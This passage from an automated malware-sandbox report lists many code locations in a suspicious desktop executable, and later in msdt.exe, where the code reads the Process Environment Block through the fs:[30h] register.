          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019AEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0192927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0199B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0199B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01912581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01912581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01912581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01912581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01911DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01911DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01911DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01966DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01966DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01966DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01966DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01966DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01966DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01998DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0196A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019AE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01914D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01914D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01914D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01907D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01923D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01963540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01966CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01966CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01966CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01966C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01966C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01966C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01966C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0197C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0197C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01967794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01967794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01967794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019237F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0197FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0197FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018FEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018FFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0197FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01928EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0199FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019136CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01918E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0199FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019AAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019AAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04747D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04763D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047AA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04754D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04754D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04754D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047D8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04751DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04751DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04751DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047535A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04752581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04752581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04752581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04752581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04722D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04722D8A mov eax, dword ptr fs:[00000030h]
